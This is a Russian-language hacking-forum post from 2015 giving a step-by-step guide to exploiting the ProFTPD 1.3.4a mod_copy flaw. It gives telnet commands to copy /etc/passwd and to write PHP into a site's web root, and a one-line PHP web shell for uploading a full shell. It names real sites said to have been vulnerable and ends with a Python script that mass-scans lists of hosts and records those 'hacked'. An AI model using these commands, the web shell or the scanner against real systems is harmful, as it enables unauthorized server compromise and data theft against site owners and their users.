ShopWorld
Вернуться ShopWorld > Статьи и обсуждение > Избранное
 

Ответ
 
Опции темы Опции просмотра
 
Старый 20.10.2015, 20:18   #1
nquadro
Посетитель
 
Аватар для nquadro
 
Регистрация: 03.10.2015
Сообщений: 4

Сказали спасибо: 1
Заливаем шелл с уязвимостью ProFTPD

Доброго времени суток!
Сегодня расскажу о недавно вышедшей уязвимости ProFTPD 1.3.4a

На текущий день сайтов которые используют данный сервис (Даже после выхода патча)
более миллиона точно.
Один из уязвимых популярных хостеров который не уведомляет своих клиентов это OVH.

Русский популярный сайт который был мне известен с этой уязвимостью это pikabu.ru - [Ссылки могут видеть только зарегистрированные пользователи. ]
Из зарубежных: psnprofiles.com
На данный момент администраторы были уведомлены и уязвимость на данных сайтах закрыта.(Файлы на пикабу не подчистили похоже)

Пошагово объясняю как эксплуатировать:
1) В windows открываем командную строку, пишем:
Код:

telnet ip 21

Где ip - это айпи нашего сайта с уязвимостью или домен
При подключение вы увидите чтото типа:
Код:

220 ProFTPD 1.3.4a Server (SGM - FTP server) [::ffff:188.165.35.78]

2) Пишем такую команду для копирования файла passwd:
Код:

site cpfr /etc/passwd

В ответ получаем:
Код:

350 File or directory exists, ready for destination name

Значит все ок и хост уязвим на 50%.
Далее отправляем следующую команду:
Код:

site cpto /tmp/passwd.copy

Если в ответе увидели
Код:

250 Copy successful

Значит все отлично уязвимость присутствует 100%
Протестировали, ну а что дальше?
А дальше нам необходимо на уязвимом сайте найти полный путь до сайта (Full Path Disclosure)
вида
Код:

/var/www/site.com/public_html/

К примеру мы уже нашли полный путь.
Остается только залить наш мини шелл.
Команды почти те же самые:
Код:

site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name

Если права на запись в папку public_html есть то мы увидим 250 Copy successful в конце. Если же нет, значит необходимо пробовать заливать в другую папку.
Код:

site cpto /var/www/site.com/public_html/test.php
250 Copy successful

На выходе мы получаем phpinfo по адресу site.com/test.php (Аналогичным способом заливаем мини шелл типа <?php eval($_REQUEST[cmd]); ?> а далее заливаем через него полноценный)
Думаю скриншоты здесь излишни, но если кому будет необходимо сделаю.
For Netsky.pw by f1rst

P.S. Ну и мой код для автоматического тестирование списка ip или сайтов(вид domen.com (без http:// и www)) на python:
Код:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by z0mbie aka f1rst, icq 579798181
import socket
import commands
import re
import time
ips=0
l=[]
f1 = open("c:/ip/good1.txt", 'w')
with open('c:/ip/ip1.txt') as f :
l = f.read().splitlines()
def ping(host, port, results = None):
try:
socket.socket().connect((host, port))
if results is not None:
results.append(port)
except:
return False
def getip(gett):
try:
d=socket.gethostbyname(gett)
return d
except:
return False
def connects(ippp):
try:
sock = socket.socket()
sock.connect((ippp, 21))
part1 = sock.recv(1024)
sock.send('site cpfr /etc/passwd \n')
part2 = sock.recv(1024)
sock.send('site cpto /tmp/passwd.copy \n')
part3 = sock.recv(1024)
sock.close()
return part3
except:
return False
while ips!=len(l):
try:
print ips
get=getip(l[ips])
if get != False:
pin=ping(get,21)
if pin != False:
con=connects(get)
if "250 Copy" in con:
print('hacked '+l[ips])
f1.write(l[ips] + '\n')
except:
print('no hacked')
ips=ips+1

Где c:/ip/ip1.txt список наших ip или доменов.

однопоточный чеккер [Ссылки могут видеть только зарегистрированные пользователи. ]
Не чекает на 21 порт, поэтому ищем тузлу чека списка айпи на порт 21 и сразу можно на 80 порт, чтобы фильтровать шлак.

Удачи!

[Ссылки могут видеть только зарегистрированные пользователи. ]
nquadro вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Сказали спасибо:
.prov1rus (22.10.2015)
Внимание посетители ShopWorld.biz
                                       У нас проводится Набор модераторов.
                                       Правила раздела: Покупка / Продажа / Обмен / Услуги
                                       Проверка ваших тем администрацией.(Раздел "Торговля")
                                       Пожелания по работе форума и Реклама на форуме.
                                       Советуем заглянуть вам в раздел Торговля и Статьи и обсуждение или World navigation
                                       Для связи с администрацией пишите в icq: 6506666 или в ЛС.
                                       Администрация не несет ответственности за причиненный вред пользователям и от других пользователей(пользуйтесь гарантом),
                                       Все материалы размещенные на сайте предоставленны в ознакомительных целях.
                                       Ап темы в разделе Покупка / Продажа / Обмен / Услуги раз в 5 дней, как апать тему читаем тут.
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продам: Продам шелл Тиц 250 -NegaTiV- Вне категорий 0 28.06.2012 15:05


Текущее время: 21:58. Часовой пояс GMT +5.

Автор ShopWorld: †SHYLLER†
Яндекс.Метрика
|Онлайн База Кидал||XakZona|